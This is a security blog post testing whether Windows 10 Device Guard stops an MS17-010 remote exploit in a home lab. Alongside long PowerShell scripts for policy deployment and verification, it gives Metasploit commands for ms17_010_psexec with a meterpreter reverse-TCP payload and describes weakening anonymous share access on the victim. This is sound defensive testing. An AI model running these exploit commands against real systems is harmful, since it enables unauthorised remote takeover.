Device Guard vs RCE


AppLocker failed to prevent a remote code exploit (here), so let's see if Device Guard does any better...

The tests will be carried out in isolation; all other security protections will be disabled. The only service protecting Windows from being pillaged is Device Guard. Microsoft seem to be going out of their way to prevent RCEs executing against Windows 10. After a few days of research and trialling, the only remote exploit that successfully works without requiring credentials is against Windows 10 1511 using MS17-010. Slightly disappointing, as I was hoping to use CVE-2020-0796 against 1903 or 1909. CVE-2020-0796 is still a POC and, with my setup, it appears to produce lots of BSoDs.

Using Windows 10 1511 is a bit of a concern, as Device Guard was upgraded with Windows 10 1703 (Creators Update). An RCE may be able to bypass 1511 but not 1703 onwards, and this test wouldn't reflect that.

The attacker is Kali on 192.168.0.65 running MS17_010_PSExec

The victim is Windows 10 x64 1511 on 192.168.0.15 running on an Asus Zenbook 301

To exploit using MS17_010_PSExec without providing credentials, two settings on the victim were relaxed:

'Restrict anonymous access to Named Pipes and Shares' was disabled

'Shares that can be accessed anonymously' had Admin$ added

In Kali start 'msfconsole' and run:

use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.0.15

set lhost 192.168.0.65

set payload windows/meterpreter/reverse_tcp

exploit

Too easy, and now the proud owner of the Zenbook.

Device Guard has the following requirements:

Hardware Requirements

UEFI Native Mode
Windows 10/2016 x64
SLAT and Virtualization Extensions (Intel VT or AMD-V)
TPM

Windows Features

Windows Defender Application Guard (Isolation mode prior to 1703)
Hyper-V Platform (Not required after 1603)
Hyper-V Hypervisor

GPO Settings

Computer Configuration > Administrative Templates > System > Device Guard

Turn on Virtualization Based Security (enabled)

Select Platform Security Level: Secure Boot and DMA Protection

Enable Virtualization Based Protection of Code Integrity

Deploy Code Integrity Policy (enabled), with the policy file path set to C:\DeviceGuard\SIPolicy.p7b

(C:\DeviceGuard\SIPolicy.p7b is automatically copied and converted to C:\Windows\System32\CodeIntegrity\)

To force the conversion, run the following:

Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\DeviceGuard\SIPolicy.p7b"}

The system will create SIPolicy.p7b in the CodeIntegrity folder and a reboot will enforce Device Guard.
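Before touching group policy it is worth confirming that the box actually meets the list above and, afterwards, that VBS and code integrity really came up. The following is an added example (not from the original post or its GitHub script) that reads the live state from the Win32_DeviceGuard CIM class alongside the Secure Boot, TPM and Hyper-V checks. It assumes an elevated PowerShell session on Windows 10 x64; the status-code meanings are the ones Microsoft documents for Win32_DeviceGuard, and the user-mode CI property is reported as "Not reported" where an older build does not expose it.

```powershell
# Added example, not part of the original post: checks the Device Guard
# prerequisites listed above and reports the current VBS / code-integrity state.
# Assumes Windows 10 x64 and an elevated PowerShell session.
# Status-code meanings follow Microsoft's Win32_DeviceGuard documentation.

function Get-DeviceGuardReadiness {
    [CmdletBinding()]
    param()

    $result = [ordered]@{}

    # UEFI + Secure Boot: Confirm-SecureBootUEFI throws on legacy BIOS systems
    try   { $result.SecureBoot = Confirm-SecureBootUEFI }
    catch { $result.SecureBoot = "Not UEFI / not supported ($($_.Exception.Message))" }

    # TPM presence and readiness (TrustedPlatformModule module)
    try {
        $tpm = Get-Tpm
        $result.TpmPresent = $tpm.TpmPresent
        $result.TpmReady   = $tpm.TpmReady
    } catch { $result.TpmPresent = "Unknown ($($_.Exception.Message))" }

    # Hyper-V hypervisor optional feature, which VBS relies on
    $hv = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Hypervisor
    $result.HyperVHypervisor = $hv.State

    # Device Guard needs x64
    $result.Architecture = (Get-CimInstance Win32_OperatingSystem).OSArchitecture

    # Live Device Guard state from the CIM provider
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard

    $vbsStatus = @{ 0 = 'Disabled'; 1 = 'Enabled, not running'; 2 = 'Running' }
    $ciStatus  = @{ 0 = 'Off'; 1 = 'Audit'; 2 = 'Enforced' }
    $props     = @{ 1 = 'Base VBS'; 2 = 'Secure Boot'; 3 = 'DMA protection' }
    $propName  = { param($p) if ($props.ContainsKey([int]$p)) { $props[[int]$p] } else { "Property $p" } }

    $result.VbsStatus  = $vbsStatus[[int]$dg.VirtualizationBasedSecurityStatus]
    $result.KernelCI   = $ciStatus[[int]$dg.CodeIntegrityPolicyEnforcementStatus]
    # Older builds may not expose the user-mode CI property at all
    $result.UserModeCI = if ($null -eq $dg.UsermodeCodeIntegrityPolicyEnforcementStatus) { 'Not reported' }
                         else { $ciStatus[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus] }
    $result.RequiredProps  = ($dg.RequiredSecurityProperties  | ForEach-Object { & $propName $_ }) -join ', '
    $result.AvailableProps = ($dg.AvailableSecurityProperties | ForEach-Object { & $propName $_ }) -join ', '
    # SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI
    $result.HvciRunning = [bool]($dg.SecurityServicesRunning -contains 2)

    [pscustomobject]$result
}

Get-DeviceGuardReadiness | Format-List
```

Run it once before the GPO change (expect VbsStatus "Disabled" and KernelCI "Off") and again after the reboot; a result of VbsStatus "Enabled, not running" usually means one of the RequiredProps is missing from AvailableProps, which is the quickest way to spot a Secure Boot or DMA-protection gap on the hardware.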

<#
.Synopsis
   Enables the Hyper-V hypervisor, builds a Device Guard code integrity policy from the current system and deploys it.
.Description
   Scans the installed binaries into C:\DeviceGuard\initialScan.xml, enables UMCI, removes audit mode, converts the policy to SIPolicy.p7b and applies it.
.Version
#>

#Enable the required hypervisor feature.
#Enable all Hyper-V features and then remove the unwanted ones; Microsoft-Hyper-V-Hypervisor cannot be enabled on its own as the Hyper-V Platform is required.
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Tools-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Services -NoRestart

#Working folder for Device Guard (created if missing so New-CIPolicy has somewhere to write)
$CIPolicyPath = "C:\DeviceGuard"
New-Item -ItemType Directory -Path $CIPolicyPath -Force | Out-Null

#C:\DeviceGuard\initialScan.xml - policy XML produced by the initial scan
$InitialCIPolicy = $CIPolicyPath + "\initialScan.xml"

#C:\DeviceGuard\SIPolicy.p7b - binary policy that the GPO deploys
$CIPolicyBin = $CIPolicyPath + "\SIPolicy.p7b"

#C:\DeviceGuard\CIPolicy.txt - warnings from the initial policy scan (PowerShell stream 3)
$CIPolicyError = $CIPolicyPath + "\CIPolicy.txt"

#Scans the system and creates initialScan.xml: FilePublisher rules, falling back to hashes for unsigned files; -UserPEs includes user-mode binaries
New-CIPolicy -Level FilePublisher -Fallback Hash -FilePath $InitialCIPolicy -UserPEs 3> $CIPolicyError

#Option 0 = Enabled:UMCI, so user-mode code integrity is enforced
Set-RuleOption -FilePath $InitialCIPolicy -Option 0

#Option 3 = Enabled:Audit Mode; deleting it puts the policy into enforcement mode
Set-RuleOption -FilePath $InitialCIPolicy -Option 3 -Delete

#Converts the audited XML to a p7b file in C:\DeviceGuard\
#GPO is set to copy SIPolicy.p7b to C:\Windows\System32\CodeIntegrity
ConvertFrom-CIPolicy -XmlFilePath $InitialCIPolicy -BinaryFilePath $CIPolicyBin

#Applies the Device Guard policy without a reboot (the file must already be in CodeIntegrity, i.e. after the GPO has copied it)
Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\Windows\System32\CodeIntegrity\SIPolicy.p7b"}

The script can be downloaded from GitHub (here).
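The two Set-RuleOption calls are the part of the script that matters for security: option 0 turns user-mode code integrity on and removing option 3 takes the policy out of audit mode. Because a policy that still carries Enabled:Audit Mode will happily log and then allow everything, it is worth checking the XML before converting and deploying it. The following is an added example, not part of the post or its GitHub script; it parses the policy XML that New-CIPolicy writes (the urn:schemas-microsoft-com:sipolicy schema) and reports the rule options plus a count of signer and hash rules. The default path is an assumption matching the post's working folder.

```powershell
# Added example, not from the original post or its GitHub script: reads the
# policy XML produced by New-CIPolicy and reports which rule options are set,
# so UMCI and enforcement can be confirmed before ConvertFrom-CIPolicy is run.
# The default path is an assumption matching the post's working folder.

function Test-CIPolicyOptions {
    param([string]$XmlPath = 'C:\DeviceGuard\initialScan.xml')

    if (-not (Test-Path -Path $XmlPath)) {
        throw "Policy XML not found: $XmlPath"
    }

    [xml]$policy = Get-Content -Path $XmlPath -Raw

    # The policy uses a default namespace, so XPath needs a prefix mapped to it
    $ns = New-Object System.Xml.XmlNamespaceManager($policy.NameTable)
    $ns.AddNamespace('si', 'urn:schemas-microsoft-com:sipolicy')

    # Rule options look like <Rules><Rule><Option>Enabled:UMCI</Option></Rule>...
    $options = @($policy.SelectNodes('//si:Rules/si:Rule/si:Option', $ns) |
                 ForEach-Object { $_.InnerText })

    $umci  = $options -contains 'Enabled:UMCI'
    $audit = $options -contains 'Enabled:Audit Mode'

    [pscustomobject]@{
        Path         = $XmlPath
        Options      = $options
        UmciEnabled  = $umci
        AuditMode    = $audit
        # Only a policy with UMCI on and audit mode removed will block putty.exe
        WillEnforce  = $umci -and -not $audit
        # FilePublisher rules land under Signers; hash fallbacks under FileRules/Allow
        SignerRules  = $policy.SelectNodes('//si:Signers/si:Signer', $ns).Count
        HashRules    = $policy.SelectNodes('//si:FileRules/si:Allow', $ns).Count
    }
}

$check = Test-CIPolicyOptions
$check | Format-List
if (-not $check.WillEnforce) {
    Write-Warning 'Policy is not in enforcement mode: check the Set-RuleOption steps before converting.'
}
```

A high HashRules count relative to SignerRules is also worth a look: every unsigned binary that fell back to a hash rule will break on its next update, which is the usual reason enforcement policies quietly get relaxed later.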

Run gpupdate and reboot.

To test Device Guard I attempted to run putty.exe and a few other applications; any exe that was not present during the audit scan would not run.

The CodeIntegrity event logs reported that the programs were not approved.
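Those "not approved" entries are the evidence a defender wants after an exploit attempt, so pulling them out programmatically is useful. The following is an added example, not part of the original post: it queries the Microsoft-Windows-CodeIntegrity/Operational log for the policy events, 3077 (blocked under enforcement) and 3076 (audit mode, would have blocked), and can read a saved .evtx instead of the live log. Reading the file and process names from the EventData fields FileNameBuffer and ProcessNameBuffer is an assumption about the event layout, which is why the full message is kept on every record.

```powershell
# Added example, not part of the original post: lists the Code Integrity
# block (3077) and audit (3076) events Device Guard writes when an unapproved
# binary is launched.  The EventData field names used for File and Process are
# an assumption about the event layout; Message always carries the full text.

function Get-CodeIntegrityBlocks {
    param(
        [int]$MaxEvents = 50,
        [string]$Path            # optional saved .evtx exported from the victim
    )

    $filter = @{ Id = 3076, 3077 }
    if ($Path) { $filter.Path = $Path }
    else       { $filter.LogName = 'Microsoft-Windows-CodeIntegrity/Operational' }

    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Flatten the EventData <Data Name="..."> elements into a lookup table
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) {
            if ($d.Name) { $data[$d.Name] = $d.'#text' }
        }

        [pscustomobject]@{
            TimeCreated = $e.TimeCreated
            Id          = $e.Id
            Mode        = if ($e.Id -eq 3077) { 'Enforced (blocked)' } else { 'Audit (would block)' }
            File        = $data['FileNameBuffer']      # assumed field name
            Process     = $data['ProcessNameBuffer']   # assumed field name
            Message     = $e.Message
        }
    }
}

# Most recent events in full, then a per-file summary
$blocks = Get-CodeIntegrityBlocks
$blocks | Select-Object TimeCreated, Mode, File, Process -First 10 | Format-Table -AutoSize
$blocks | Group-Object File | Sort-Object Count -Descending | Select-Object Count, Name
```

If every record comes back as "Audit (would block)" the policy is still carrying the audit-mode option, and the exploit test above would succeed regardless of what the log says.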

And now for the remote code exploit...

The good news is that Device Guard prevented the exploit on repeated attempts. That's a good day at the office: the system is safe and the attacker frustrated.